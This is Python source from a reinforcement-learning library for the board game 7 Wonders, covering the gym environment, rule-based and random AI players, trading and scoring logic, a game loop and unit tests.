# playerCur = self.playerList[playerNum]
# print("Player " + str(playerCur.player))
# print("Card")
# for card in playerCur.hand:
# print(card.name)
if self.turn == 6 and not "extraPlay" in info.keys():
for j in range(len(self.playerList)):
self.discarded.append(self.playerList[j + 1].hand[0])
# print(self.playerList[j + 1].hand)
if self.playerList[1].endAgeEffect == "playSeventhCard":
info["extraPlay"] = "playSeventhCard"
self.specialAction = 2
if self.age == 3 and not "extraPlay" in info.keys():
endScore = []
for i in range(len(self.playerList)):
endScore.append((i + 1, self.playerList[i + 1].endGameCal()))
endScore = sorted(endScore, key=itemgetter(1), reverse=True)
for key, value in endScore:
print("Player {} score {}".format(key, value))
for i in range(len(endScore)):
key = endScore[i][0]
print(key)
if key == 1: # endScore[i] is DQN, not RBAI
if i == 0:
reward = 1.5
elif i == 1:
reward = 0.5
elif i == 2:
reward = -0.5
elif i == 3:
reward = -1.5
done = True
elif "extraPlay" not in info.keys(): # end Age
self.age += 1
self.turn = 0
for i in range(len(self.playerList)):
self.playerList[i + 1].assignHand(self.cardShuffled[self.age - 1][i])
if any("freeStructure" in effect for effect in self.playerList[i + 1].endAgeEffect):
self.playerList[i + 1].freeStructure = True
# print("AFTER AGE" + str(self.age) + "TURN" + str(self.turn))
# for playerNum in self.playerList:
# playerCur = self.playerList[playerNum]
# print("Player " + str(playerCur.player))
# print("Card")
# for card in playerCur.hand:
# print(card.name)
# print("special " + str(self.specialAction))
return rewardAll
def legalAction(self, playerNum):
"""
Given the player number, return all legal actions as a list of action code
Args:
playerNum: The position of player (1-n)
Returns:
List[actionCode]
"""
player = self.playerList[playerNum]
actionCode = range(4)
posAct = []
for card in player.hand:
if self.specialAction == 1: # play from discard
posAct.append(self.__actionToCode(self.dictCardToCode[card.name], 0))
continue
for action in actionCode:
if action == 2: # discard is always available
posAct.append(self.__actionToCode(self.dictCardToCode[card.name], action))
if action == 0: # pay normally
left, right = player.playable(card)
if left != -1 and right != -1:
posAct.append(self.__actionToCode(self.dictCardToCode[card.name], action))
if action == 1: # pay with effect freeStructure
if player.freeStructure:
posAct.append(self.__actionToCode(self.dictCardToCode[card.name], action))
if action == 3:
steps = player.wonders.step
existedStage = player.wonders.stage + 1
# print(type(steps[existedStage]))
if existedStage < len(steps):
left, right = player.playable(steps[existedStage])
if left != -1 and right != -1:
posAct.append(self.__actionToCode(self.dictCardToCode[card.name], action))
return posAct
def reset(self, seed=None, options=None):
"""
Reset the environment after each episode
Args:
seed: Seed ID for randomization
options: Default to None
Returns:
List[State]
"""
self.age = 1
self.turn = 0
self.cardShuffled = []
self.discarded = []
self.cardAge, self.playerList = self.__initGameNPerson(self.player)
self.setPersonality(self.personalityList)
for ageNum in range(1, 4):
cardThisAge = self.cardAge[ageNum - 1]
random.shuffle(cardThisAge)
self.cardShuffled.append([cardThisAge[i : i + 7] for i in range(0, len(cardThisAge), 7)])
for i in range(len(self.cardShuffled[0])):
self.playerList[i + 1].assignHand(self.cardShuffled[0][i])
state = self.__stateGenerator(1)
vecState = np.array(state).reshape((70,))
# (vecState.shape)
return vecState
def render(self, mode="human"):
pass
def close(self):
pass | 7Wonder-RL-Lib | /7Wonder-RL-Lib-0.1.1.tar.gz/7Wonder-RL-Lib-0.1.1/SevenWondersEnv/SevenWonEnv/envs/SevenWonderEnv.py | SevenWonderEnv.py |
import random
from sys import stdin
from copy import deepcopy
from SevenWonEnv.envs.mainGameEnv.stageClass import Stage
from SevenWonEnv.envs.mainGameEnv.cardClass import Card
class Personality:
def __init__(self):
pass
def make_choice(self, player, age, options):
pass
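# Contract used by the game loop: make_choice receives the acting player, the
# current age (1-3), and a list of candidate plays, and must return an integer
# index into that list.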
class DQNAI(Personality): # placeholder
def __init__(self):
super().__init__()
def make_choice(self, player, age, options):
pass
class RuleBasedAI(Personality):
def __init__(self):
super().__init__()
def make_choice(self, player, age, options):
# return random.choice(range(len(options)))
for choicesIndex in range(len(options)):
if isinstance(options[choicesIndex][0], Stage): # If stage is free, buy it. 50% to buy if it's not free.
if options[choicesIndex][1] + options[choicesIndex][2] == 0 or random.randint(0, 1) % 2 == 0:
return choicesIndex
else:
continue
        # options[choicesIndex][3] is the play code: -1 means discard, 0 means play with paying, 1 means play via a free-play effect.
if age < 3:
posChoice = []
nonDiscard = []
for choicesIndex in range(len(options)):
if options[choicesIndex][3] != -1:
nonDiscard.append(choicesIndex)
            if not nonDiscard:  # only discard choices are available
                return random.choice(range(len(options)))
for choicesIndex in range(
len(options)
): # Select Card that gives more than 1 resource. If there are multiple cards, select one randomly
if type(options[choicesIndex][0]).__name__ == "Card":
if options[choicesIndex][0].getResource["type"] == "mixed" and options[choicesIndex][3] != -1:
posChoice.append(choicesIndex)
if posChoice:
return random.choice(posChoice)
for choicesIndex in range(
len(options)
): # Select Card that can be selected between resource. If there are multiple cards, select one randomly
if isinstance(options[choicesIndex][0], Card):
if options[choicesIndex][0].getResource["type"] == "choose" and options[choicesIndex][3] != -1:
posChoice.append(choicesIndex)
if posChoice:
return random.choice(posChoice)
zeroRes = {key: value for (key, value) in player.resource.items() if value == 0 and key != "shield"}
for choicesIndex in range(
len(options)
): # Select resource that does not have yet (0 resource) except military. If there are multiple cards, select one randomly
if isinstance(options[choicesIndex][0], Card):
for res in zeroRes.keys():
if options[choicesIndex][0].getResource["type"] == res and options[choicesIndex][3] != -1:
posChoice.append(choicesIndex)
if posChoice:
return random.choice(posChoice)
if not (
player.resource["shield"] > player.left.resource["shield"]
or player.resource["shield"] > player.right.resource["shield"]
):
for choicesIndex in range(
len(options)
): # Select military IF it makes player surpass neighbors in shield. If there are multiple cards, select one randomly
if isinstance(options[choicesIndex][0], Card):
if options[choicesIndex][0].getResource["type"] == "shield" and options[choicesIndex][3] != -1:
shieldPts = options[choicesIndex][0].getResource["amount"]
if (
player.resource["shield"] + shieldPts > player.left.resource["shield"]
or player.resource["shield"] + shieldPts > player.right.resource["shield"]
):
posChoice.append(choicesIndex)
if posChoice:
return random.choice(posChoice)
for choicesIndex in range(len(options)): # Select science card. If there are multiple cards, select one.
if isinstance(options[choicesIndex][0], Card):
if options[choicesIndex][0].color == "green" and options[choicesIndex][3] != -1:
posChoice.append(choicesIndex)
if posChoice:
return random.choice(posChoice)
for choicesIndex in range(len(options)): # Select VP (civil) card. If there are multiple cards, select one.
if isinstance(options[choicesIndex][0], Card):
if options[choicesIndex][0].getResource["type"] == "VP" and options[choicesIndex][3] != -1:
if not posChoice:
posChoice.append(choicesIndex)
elif (
options[posChoice[0]][0].getResource["amount"]
< options[choicesIndex][0].getResource["amount"]
):
posChoice = [choicesIndex]
if posChoice:
return random.choice(posChoice)
# play random non-discarded choice
return random.choice(nonDiscard)
else: # age 3. Simulate all plays, greedy by most points.
basePoints = player.endGameCal()
gainPoints = -1
selected = []
for choicesIndex in range(len(options)):
afterPlayer = deepcopy(player)
afterPlayer.hand = deepcopy(player.hand)
# print("HAND")
# print(len(afterPlayer.hand))
# print(choicesIndex)
# print(options[choicesIndex])
afterPlayer.playChosenCardFake(options[choicesIndex])
addPoints = afterPlayer.endGameCal() - basePoints
                if addPoints < 0:
                    print("WARNING: simulated play decreased the end-game score")
if addPoints > gainPoints:
selected = [choicesIndex]
gainPoints = addPoints
elif addPoints == gainPoints:
selected.append(choicesIndex)
if selected:
return random.choice(selected)
else:
return random.choice(range(len(options)))
class Human(Personality):
def __init__(self):
super().__init__()
def make_choice(self, player, age, options):
return int(stdin.readline())
class RandomAI(Personality):
def __init__(self):
super().__init__()
def make_choice(self, player, age, options):
return random.choice(range(len(options))) | 7Wonder-RL-Lib | /7Wonder-RL-Lib-0.1.1.tar.gz/7Wonder-RL-Lib-0.1.1/SevenWondersEnv/SevenWonEnv/envs/mainGameEnv/Personality.py | Personality.py |
import json
import random
from operator import itemgetter
from SevenWonEnv.envs.mainGameEnv.mainHelper import (
filterPlayer,
buildCard,
rotateHand,
battle,
)
from SevenWonEnv.envs.mainGameEnv.PlayerClass import Player
from SevenWonEnv.envs.mainGameEnv.WonderClass import Wonder
from SevenWonEnv.envs.mainGameEnv.resourceClass import Resource
from SevenWonEnv.envs.mainGameEnv.Personality import RuleBasedAI
from SevenWonEnv.envs.mainGameEnv.stageClass import Stage
import sys
def init(player):
fileOper = open("Card/card_list.json", "rt")
cardList = json.load(fileOper)
cardAge = []
for i in range(1, 4):
cardAge.append(getCardAge("age_" + str(i), player, cardList))
fileOper = open("Card/wonders_list.json", "rt")
wonderList = json.load(fileOper)
wonderList = wonderList["wonders"]
wonderName = list(wonderList.keys())
random.shuffle(wonderName)
wonderSelected = wonderName[0:player]
# print(wonderSelected)
# print(wonderList['Rhodes'])
playerList = {}
for i in range(1, player + 1):
newPlayer = Player(i, player, RuleBasedAI)
side = "A" if random.randrange(2) % 2 == 0 else "B"
wonderCurName = wonderSelected[i - 1]
wonderCur = wonderList[wonderCurName]
initialResource = Resource(wonderCur["initial"]["type"], wonderCur["initial"]["amount"])
# print(type(wonderList[wonderCurName][side]))
newWonders = Wonder(wonderCurName, side, initialResource, **wonderList[wonderCurName][side])
newPlayer.assignWonders(newWonders)
playerList[i] = newPlayer
for i in range(1, player + 1):
curPlayer = playerList[i]
playerList[i].assignLeftRight(playerList[curPlayer.left], playerList[curPlayer.right])
print("SETUP COMPLETE")
return cardAge, playerList
def getCardAge(age, player, cardList):
jsonAge = filterPlayer(cardList[age], player)
cardAge = []
for color in jsonAge:
for card in jsonAge[color]:
card = buildCard(card["name"], color, card["payResource"], card["getResource"])
cardAge.append(card)
return cardAge
if __name__ == "__main__":
discarded = []
logger = open("loggers.txt", "w+")
player = input("How many players?")
player = int(player)
path = "../gameLog.txt"
sys.stdout = open(path, "w")
cardAge, playerList = init(player)
for player in playerList.keys():
print("Player {} with wonders {}".format(player, playerList[player].wonders.name))
for age in range(1, 4):
cardThisAge = cardAge[age - 1]
random.shuffle(cardThisAge)
cardShuffled = [cardThisAge[i : i + 7] for i in range(0, len(cardThisAge), 7)]
for i in range(len(cardShuffled)):
if any("freeStructure" in effect for effect in playerList[i + 1].endAgeEffect):
playerList[i + 1].freeStructure = True
playerList[i + 1].assignHand(cardShuffled[i])
for i in range(0, 6):
for j in range(len(playerList)):
# print("j" + str(j))
card, action = playerList[j + 1].playCard(age)
if action == -1: # card discarded
discarded.append(card)
print("PLAYER {} discard {}".format(j + 1, card.name))
elif isinstance(card, Stage):
print("PLAYER {} play step {}".format(j + 1, card.stage))
else:
print("PLAYER {} play {}".format(j + 1, card.name))
rotateHand(playerList, age)
for j in range(len(playerList)):
print("PLAYER {} resource".format(j + 1), end=" ")
for res in playerList[j + 1].resource:
print(res, playerList[j + 1].resource[res], end=" ")
print()
for j in range(len(playerList)):
player = playerList[j + 1]
if player.endTurnEffect == "buildDiscarded":
card, action = player.playFromEffect(discarded, player.endTurnEffect, age=age)
discarded = [disCard for disCard in discarded if disCard.name != card.name]
print("REMAINING HANDS")
for j in range(len(playerList)):
discarded.append(playerList[j + 1].hand[0])
print(playerList[j + 1].hand)
print("AGE" + str(age))
for j in range(len(playerList)):
playerList[j + 1].printPlayer()
# military conflict
for j in range(1, 1 + len(playerList)):
battle(playerList[j], playerList[j % len(playerList) + 1], age)
# end game period
endScore = []
for i in range(len(playerList)):
endScore.append((i + 1, playerList[i + 1].endGameCal()))
endScore = sorted(endScore, key=itemgetter(1), reverse=True)
print("SCOREBOARD")
for i in endScore:
print("Player {} with score {}".format(i[0], i[1])) | 7Wonder-RL-Lib | /7Wonder-RL-Lib-0.1.1.tar.gz/7Wonder-RL-Lib-0.1.1/SevenWondersEnv/SevenWonEnv/envs/mainGameEnv/main.py | main.py |
from SevenWonEnv.envs.mainGameEnv.resourceClass import Resource
from SevenWonEnv.envs.mainGameEnv.cardClass import Card
from SevenWonEnv.envs.mainGameEnv.stageClass import Stage
from SevenWonEnv.envs.mainGameEnv import mainHelper
import operator
class ResourceBFS:
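    # A node in the trade-cost search: accuArr holds the concrete resources
    # chosen so far from "choose" cards, remainArr the choose-cards that have
    # not been expanded yet.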
def __init__(self, accuArr, remainArr):
self.accuArr = accuArr
self.remainArr = remainArr
class Player:
def __init__(self, playerNumber, totalPlayer, person):
self.player = playerNumber
self.card = []
self.choosecard = []
self.chooseStage = []
self.coin = 3
self.warVP = 0
self.warLoseVP = 0
self.color = dict.fromkeys(["brown", "grey", "blue", "yellow", "red", "green", "purple"], 0)
self.eastTradePrices = dict.fromkeys(["wood", "clay", "ore", "stone", "papyrus", "glass", "loom"], 2)
self.westTradePrices = self.eastTradePrices.copy()
self.resource = dict.fromkeys(
[
"wood",
"clay",
"ore",
"stone",
"papyrus",
"glass",
"loom",
"compass",
"wheel",
"tablet",
"shield",
],
0,
)
self.VP = 0
self.wonders = None
self.left = (playerNumber - 2) % totalPlayer + 1
self.right = playerNumber % totalPlayer + 1
self.hand = []
self.lastPlayColor = None
self.lastPlayEffect = None
self.endAgeEffect = []
self.endGameEffect = []
self.personality = person
self.freeStructure = False
self.endTurnEffect = None
def assignPersonality(self, personality):
self.personality = personality
def assignWonders(self, wonder):
self.wonders = wonder
beginRes = wonder.beginResource
self.resource[beginRes.resource] += beginRes.amount
def assignLeftRight(self, leftPlayer, rightPlayer):
self.left = leftPlayer
self.right = rightPlayer
def printPlayer(self):
print(self.__dict__)
self.wonders.printWonder()
for card in self.card:
print(card.name, end=" ")
def assignHand(self, hand):
self.hand = hand
def cardExist(self, name):
for singleCard in self.card:
if singleCard.name == name:
return True
return False
def resourceExist(self, resourceType): # Use in case of neighbor Player
if self.resource[resourceType] > 0:
return True
for card in self.choosecard:
for choose in card.getResource["resource"]:
if choose["type"] == resourceType:
return True
return False
def checkLeftRight(self, amount, resourceType):
leftPrice = self.westTradePrices[resourceType]
rightPrice = self.eastTradePrices[resourceType]
minPrice = 10000000
side = "M"
if self.coin >= leftPrice * amount and self.left.resourceExist(resourceType):
minPrice = leftPrice * amount
side = "L"
if self.coin >= rightPrice * amount and self.right.resourceExist(resourceType):
if minPrice > rightPrice * amount:
minPrice = rightPrice * amount
side = "R"
if side == "M":
return -1, side
return minPrice, side
def addiResComp(self, targetArr, curResArr):
# print("BEFORE")
# for i in targetArr:
# i.printResource()
for res in curResArr:
name = res.resource
# print("Name" + name)
for tar in targetArr:
if name == tar.resource:
tar.amount -= res.amount
targetArr = [i for i in targetArr if i.amount > 0]
# print("AFTER")
# for i in targetArr:
# i.printResource()
return targetArr
def BFS(self, targetArray, resourceArray):
queue = []
minLeft = 10000000
minRight = 10000000
queue.append(ResourceBFS([], resourceArray))
while queue:
left = 0
right = 0
price = -1
side = "M"
# print(queue[0])
qFront = queue[0]
curRes = qFront.accuArr
# print(curRes)
remainRes = qFront.remainArr
# print("REMAINRES")
# print(remainRes)
remainArr = self.addiResComp(targetArray[:], curRes[:])
for remain in remainArr:
price, side = self.checkLeftRight(remain.amount, remain.resource)
if price == -1:
break
if side == "L":
left += price
elif side == "R":
right += price
if price != -1 and left + right < minLeft + minRight:
minLeft = left
minRight = right
queue.pop(0)
if remainRes:
resChooseCard = remainRes[0]
for res in resChooseCard.getResource["resource"]:
# print("RES")
# print(res)
selectRes = mainHelper.resBuild(res)
newResAccu = curRes[:]
newResAccu.append(selectRes)
# print('NewResAccu : {}'.format(newResAccu))
newRemRes = remainRes[1:]
if newRemRes is None:
newRemRes = []
queue.append(ResourceBFS(newResAccu, newRemRes))
return minLeft, minRight
def playable(self, card):
# if isinstance(card,Stage):
# print("IN STAGE")
# print(card.payResource)
# print("--------------")
# print(card.payResource)
payRes = card.payResource
if payRes["type"] == "choose":
if self.cardExist(payRes["resource"][0]["name"]):
return 0, 0
else:
payRes = payRes["resource"][1]
# print("NEW PAYRES-----")
# print(payRes)
if payRes["type"] == "none":
return 0, 0
elif payRes["type"] == "coin":
if self.coin >= payRes["amount"]:
return 0, 0
else:
return -1, -1
else:
missResource = {}
if payRes["type"] == "mixed":
for res in payRes["resource"]:
if self.resource[res["type"]] < res["amount"]:
missResource[res["type"]] = res["amount"] - self.resource[res["type"]]
else:
res = payRes
if self.resource[res["type"]] < res["amount"]:
missResource[res["type"]] = res["amount"] - self.resource[res["type"]]
            if not missResource:
return 0, 0
missResource = dict(sorted(missResource.items(), key=operator.itemgetter(1), reverse=True))
# print("oldMissResource")
# print(missResource)
missArr = []
for name, amount in missResource.items():
missArr.append(Resource(name, amount))
left, right = self.BFS(missArr, self.choosecard + self.chooseStage)
if self.coin >= left + right:
return left, right
else:
return -1, -1
def findCardFromHand(self, cardName):
for card in self.hand:
if card.name == cardName:
return card
return None
def activateEffect(self, effect):
if effect == "freeStructure":
self.freeStructure = True
self.endAgeEffect.append(effect)
elif effect == "playSeventhCard":
self.endAgeEffect.append(effect)
elif effect == "buildDiscarded":
self.endTurnEffect = effect
elif effect == "sideTradingRaws":
self.activateEffect("eastTradingRaws")
self.activateEffect("westTradingRaws")
elif effect == "eastTradingRaws":
self.eastTradePrices["wood"] = 1
self.eastTradePrices["clay"] = 1
self.eastTradePrices["ore"] = 1
self.eastTradePrices["stone"] = 1
elif effect == "westTradingRaws":
self.westTradePrices["wood"] = 1
self.westTradePrices["clay"] = 1
self.westTradePrices["ore"] = 1
self.westTradePrices["stone"] = 1
elif effect == "sideManuPosts":
self.eastTradePrices["papyrus"] = 1
self.eastTradePrices["glass"] = 1
self.eastTradePrices["loom"] = 1
self.westTradePrices["papyrus"] = 1
self.westTradePrices["glass"] = 1
self.westTradePrices["loom"] = 1
elif effect == "threeBrownOneCoin":
self.coin += self.left.color["brown"] + self.color["brown"] + self.right.color["brown"]
elif effect == "brownOneCoinOneVP":
self.coin += self.color["brown"]
self.endGameEffect.append(effect)
elif effect == "yellowOneCoinOneVP":
self.coin += self.color["yellow"]
self.endGameEffect.append(effect)
elif effect == "stageThreeCoinOneVP":
self.coin += self.wonders.stage * 3
self.endGameEffect.append(effect)
elif effect == "greyTwoCoinTwoVP":
self.coin += self.color["grey"] * 2
self.endGameEffect.append(effect)
else: # effect == "sideBrownOneVP","sideGreyTwoVP","sideYellowOneVP","sideGreenOneVP","sideRedOneVP",
# "sideDefeatOneVP","brownGreyPurpleOneVP", "brownOneCoinOneVP", "yellowOneCoinOneVP", "stageThreeCoinOneVP",
# "greyTwoCoinTwoVP","copyPurpleNeighbor"
self.endGameEffect.append(effect)
def VPFromSide(self, col, mult):
return (self.left.color[col] + self.right.color[col]) * mult
def VPFromEffect(self, effect):
if effect == "sideBrownOneVP":
return self.VPFromSide("brown", 1)
elif effect == "sideGreyTwoVP":
return self.VPFromSide("grey", 2)
elif effect == "sideYellowOneVP":
return self.VPFromSide("yellow", 1)
elif effect == "sideGreenOneVP":
return self.VPFromSide("green", 1)
elif effect == "sideRedOneVP":
return self.VPFromSide("red", 1)
elif effect == "sideDefeatOneVP":
return self.left.warLoseVP + self.right.warLoseVP
elif effect == "brownGreyPurpleOneVP":
return self.color["brown"] + self.color["grey"] + self.color["purple"]
elif effect == "brownOneCoinOneVP":
return self.color["brown"]
elif effect == "yellowOneCoinOneVP":
return self.color["yellow"]
elif effect == "stageThreeCoinOneVP":
return self.wonders.stage
elif effect == "greyTwoCoinTwoVP":
return self.color["grey"] * 2
else:
return 0
def scienceVP(self, chooseScience):
maxScience = 0
compass = self.resource["compass"]
wheel = self.resource["wheel"]
tablet = self.resource["tablet"]
if chooseScience == 0:
return compass**2 + wheel**2 + tablet**2 + min(compass, wheel, tablet) * 7
for addCom in range(0, chooseScience):
for addWheel in range(0, chooseScience - addCom):
addTab = chooseScience - addCom - addWheel
compass = addCom + self.resource["compass"]
wheel = addWheel + self.resource["wheel"]
tablet = addTab + self.resource["tablet"]
points = compass**2 + wheel**2 + tablet**2 + min(compass, wheel, tablet) * 7
if points > maxScience:
maxScience = points
return maxScience
def endGameCal(self):
extraPoint = 0
# print("Player" + str(self.player))
# print("Before" + str(self.VP))
# military
extraPoint += self.warVP - self.warLoseVP
# print("War : " + str(self.warVP - self.warLoseVP))
# coin : 3coins -> 1VP
extraPoint += int(self.coin / 3)
# print("Coin : " + str(int(self.coin/3)))
# wonders VP are automatically added when wonders are played
# effect cards activation
copyPurple = False
for effect in self.endGameEffect:
if effect == "copyPurpleNeighbor":
copyPurple = True
else:
extraPoint += self.VPFromEffect(effect)
maxCopy = 0
scienceNeighbor = False
if copyPurple:
purple = []
for card in self.left.card:
if card.color == "purple":
purple.append(card)
for card in self.right.card:
if card.color == "purple":
purple.append(card)
maxPt = 0
for card in purple:
if card.name == "scientists guild":
scienceNeighbor = True
else:
if maxPt < self.VPFromEffect(card.getResource["effect"]):
maxPt = self.VPFromEffect(card.getResource["effect"])
maxCopy = maxPt
# science points
chooseScience = 0
for card in self.choosecard:
if card.getResource["type"] == "choose" and card.getResource["resource"][0]["type"] == "compass":
chooseScience += 1
for i in range(0, self.wonders.stage):
if (
self.wonders.step[i + 1].getResource["type"] == "choose"
and self.wonders.step[i + 1].getResource["resource"][0]["type"] == "compass"
):
chooseScience += 1
maxScience = self.scienceVP(chooseScience)
if scienceNeighbor:
copyScience = self.scienceVP(chooseScience + 1)
if maxScience + maxCopy < copyScience:
maxScience = copyScience
# print("Science : " + str(maxScience))
extraPoint += maxScience
return self.VP + extraPoint
def deleteCardFromHand(self, card):
        if any(cardExist.name == card.name for cardExist in self.hand):
self.hand.remove(card)
return 1
else:
return -1
def addedCardSys(self, cardGetResource, selectedCard):
if cardGetResource["type"] == "choose":
if isinstance(selectedCard, Stage):
self.chooseStage.append(selectedCard)
else:
self.choosecard.append(selectedCard)
elif cardGetResource["type"] == "VP":
self.VP += cardGetResource["amount"]
elif cardGetResource["type"] == "coin":
self.coin += cardGetResource["amount"]
elif cardGetResource["type"] != "effect":
self.resource[cardGetResource["type"]] += cardGetResource["amount"]
else:
self.activateEffect(cardGetResource["effect"])
self.lastPlayEffect = cardGetResource["effect"]
return
def playChosenCard(self, selectedCard):
self.lastPlayEffect = None
leftPrice = selectedCard[1]
rightPrice = selectedCard[2]
action = selectedCard[3]
stage = None
if len(selectedCard) == 5:
stage = selectedCard[4]
selectedCard = selectedCard[0]
if action == -1:
# print("SELECT")
# if isinstance(selectedCard,Card):
# print(selectedCard.name)
# else:
# print(selectedCard.stage)
status = self.deleteCardFromHand(selectedCard)
            if status == -1:
                print("ERROR STATUS: card was not in hand")
self.coin += 3
return selectedCard, action
elif action == 1:
self.freeStructure = False
if isinstance(selectedCard, Card):
# print(selectedCard.name)
status = self.deleteCardFromHand(selectedCard)
self.card.append(selectedCard)
self.color[selectedCard.color] += 1
self.lastPlayColor = selectedCard.color
elif action == 2:
status = self.deleteCardFromHand(selectedCard)
self.wonders.stage += 1
# print(self.wonders.name)
# print(self.wonders.step[self.wonders.stage].printCard())
if selectedCard.getResource["type"] == "mixed":
for resource in selectedCard.getResource["resource"]:
if resource["type"] == "mixed":
for innerRes in resource["resource"]:
self.addedCardSys(innerRes, selectedCard)
else:
# print(resource["type"])
self.addedCardSys(resource, selectedCard)
elif selectedCard.getResource["type"] == "choose":
if isinstance(stage, Stage):
self.chooseStage.append(stage)
else:
self.choosecard.append(selectedCard)
else:
self.addedCardSys(selectedCard.getResource, selectedCard)
return selectedCard, action
def playChosenCardFake(self, selectedCard):
self.lastPlayEffect = None
leftPrice = selectedCard[1]
rightPrice = selectedCard[2]
action = selectedCard[3]
stage = None
if len(selectedCard) == 5:
stage = selectedCard[4]
selectedCard = selectedCard[0]
if action == -1:
# print("SELECT")
# if isinstance(selectedCard,Card):
# print(selectedCard.name)
# else:
# print(selectedCard.stage)
# self.deleteCardFromHand(selectedCard)
self.coin += 3
return selectedCard, action
elif action == 1:
self.freeStructure = False
if isinstance(selectedCard, Card):
# print(selectedCard.name)
# self.deleteCardFromHand(selectedCard)
self.card.append(selectedCard)
self.color[selectedCard.color] += 1
self.lastPlayColor = selectedCard.color
elif action == 2:
# self.deleteCardFromHand(stageCard)
self.wonders.stage += 1
# print(self.wonders.name)
# print(self.wonders.step[self.wonders.stage].printCard())
if selectedCard.getResource["type"] == "mixed":
for resource in selectedCard.getResource["resource"]:
if resource["type"] == "mixed":
for innerRes in resource["resource"]:
self.addedCardSys(innerRes, selectedCard)
else:
# print(resource["type"])
self.addedCardSys(resource, selectedCard)
elif selectedCard.getResource["type"] == "choose":
if isinstance(selectedCard, Stage):
self.chooseStage.append(stage)
else:
self.choosecard.append(selectedCard)
else:
self.addedCardSys(selectedCard.getResource, selectedCard)
return selectedCard, action
def playFromEffect(self, cardList, effect, age): # playSeventhCard or buildDiscarded
if effect == "playSeventhCard":
card = cardList[0]
choices = []
choices.append([card, 0, 0, -1])
left, right = self.playable(card)
if left != -1 and right != -1:
choices.append([card, left, right, 0])
steps = self.wonders.step
# print("LEN STEPS : {}".format(len(steps)))
existedStage = self.wonders.stage + 1
# print(type(steps[existedStage]))
if existedStage < len(steps):
left, right = self.playable(steps[existedStage])
if left != -1 and right != -1:
for card in self.hand:
choices.append([card, left, right, 2, steps[existedStage]])
# print("APPENDED STAGES")
persona = self.personality
selectedCard = choices[persona.make_choice(self=persona, player=self, age=age, options=choices)]
return self.playChosenCard(selectedCard)
elif effect == "buildDiscarded":
choices = []
for card in cardList:
choices.append([card, 0, 0, 0])
persona = self.personality
selectedCard = choices[persona.make_choice(self=persona, player=self, age=age, options=choices)]
self.hand.append(selectedCard[0])
return self.playChosenCard(selectedCard)
else:
print("something wrong")
exit(-1)
def playCard(self, age):
self.lastPlayEffect = None
self.endTurnEffect = None
choices = []
for card in self.hand:
choices.append([card, 0, 0, -1]) # -1 for discard card
for card in self.hand:
left, right = self.playable(card)
if left != -1 and right != -1:
choices.append([card, left, right, 0]) # card,leftPrice,rightPrice,0 for not using free effect
        if self.freeStructure:
for card in self.hand:
choices.append([card, 0, 0, 1]) # card,leftPrice,rightPrice,1 for using free effect
steps = self.wonders.step
existedStage = self.wonders.stage + 1
if existedStage < len(steps):
left, right = self.playable(steps[existedStage])
if left != -1 and right != -1:
for card in self.hand:
choices.append([card, left, right, 2, steps[existedStage]]) # Append Stage
persona = self.personality
selectedCard = choices[persona.make_choice(self=persona, player=self, age=age, options=choices)]
print("SELECT", selectedCard)
return self.playChosenCard(selectedCard) | 7Wonder-RL-Lib | /7Wonder-RL-Lib-0.1.1.tar.gz/7Wonder-RL-Lib-0.1.1/SevenWondersEnv/SevenWonEnv/envs/mainGameEnv/PlayerClass.py | PlayerClass.py |
from SevenWonEnv.envs.mainGameEnv.mainHelper import (
filterPlayer,
buildCard,
rotateHand,
battle,
)
from SevenWonEnv.envs.mainGameEnv.PlayerClass import Player
from SevenWonEnv.envs.mainGameEnv.WonderClass import Wonder
from SevenWonEnv.envs.mainGameEnv.resourceClass import Resource
from SevenWonEnv.envs.mainGameEnv.Personality import (
Personality,
RandomAI,
RuleBasedAI,
Human,
DQNAI,
)
from SevenWonEnv.envs.mainGameEnv.stageClass import Stage
from SevenWonEnv.envs.mainGameEnv.cardClass import Card
from SevenWonEnv.envs.SevenWonderEnv import SevenWonderEnv
import gymnasium as gym
import unittest
from unittest import mock
# Unit Testing
class Test(unittest.TestCase):
def test_AddNoPlayer(self):
with mock.patch.object(SevenWonderEnv, "__init__", lambda sel, player: None):
env = SevenWonderEnv(player=4)
env.unAssignedPersonality = 4
with self.assertRaises(SystemExit) as cm:
env.step(0)
exc = cm.exception
assert exc.code == "Program Stopped : Some Players do not have personality."
def test_AddTooManyPlayer(self):
with mock.patch.object(SevenWonderEnv, "__init__", lambda sel, player: None):
env = SevenWonderEnv(player=4)
env.unAssignedPersonality = 0
env.player = 4
env.playerList = []
with self.assertRaises(SystemExit) as cm:
env.setPersonality([Human])
exc = cm.exception
assert exc.code == "Program Stopped : Add too many players' personality"
def test_GetCardAge(self):
with mock.patch.object(SevenWonderEnv, "__init__", lambda sel, player: None):
env = SevenWonderEnv(player=3)
cardList = {
"age_1": {
"3players": {
"brown": [
{
"name": "lumber yard",
"payResource": {"type": "none"},
"getResource": {"type": "wood", "amount": 1},
}
]
}
}
}
result = env.getCardAge("age_1", 3, cardList)
assert result[0].name == "lumber yard"
assert result[0].color == "brown"
assert result[0].getResource == {"type": "wood", "amount": 1}
assert result[0].payResource == {"type": "none"}
def testBattle(self):
with mock.patch.object(Player, "__init__", lambda se, playNum, totNum, person: None):
p1 = Player(0, 4, Human)
p2 = Player(0, 4, Human)
p1.resource = {}
p2.resource = {}
p1.resource["shield"] = 0
p2.resource["shield"] = 1
p1.warVP = 0
p2.warVP = 0
battle(p1, p2, age=1)
assert p1.warVP == -1
assert p2.warVP == 1
p1.warVP = 0
p2.warVP = 0
battle(p1, p2, age=2)
assert p1.warVP == -1
assert p2.warVP == 3
p1.resource["shield"] = 1
battle(p1, p2, age=3)
assert p1.warVP == -1
assert p2.warVP == 3
def testAssignWonders(self):
with mock.patch.object(Wonder, "__init__", lambda se, name, side, begin: None):
won = Wonder("Rhodes", "A", Resource("wood", 2))
won.beginResource = Resource("wood", 2)
player = Player(1, 4, Human)
player.assignWonders(won)
assert player.resource["wood"] == 2
# Integration Testing
def testInitGameWithAI(self):
env = SevenWonderEnv(player=4)
env.setPersonality([RuleBasedAI, RuleBasedAI, RuleBasedAI, RuleBasedAI])
assert env.player == 4
assert env.unAssignedPersonality == 0
for i in range(1, 5):
assert len(env.playerList[i].hand) == 7
def testStepGameWithAI(self):
env = SevenWonderEnv(player=4)
env.setPersonality([RuleBasedAI, RuleBasedAI, RuleBasedAI, RuleBasedAI])
assert env.player == 4
assert env.unAssignedPersonality == 0
for i in range(1, 5):
assert len(env.playerList[i].hand) == 7
rewardAll = env.step(0)
assert len(rewardAll) == 4
assert len(rewardAll[0]) == 4
state = env.reset()
assert len(state) == 70
if __name__ == "__main__":
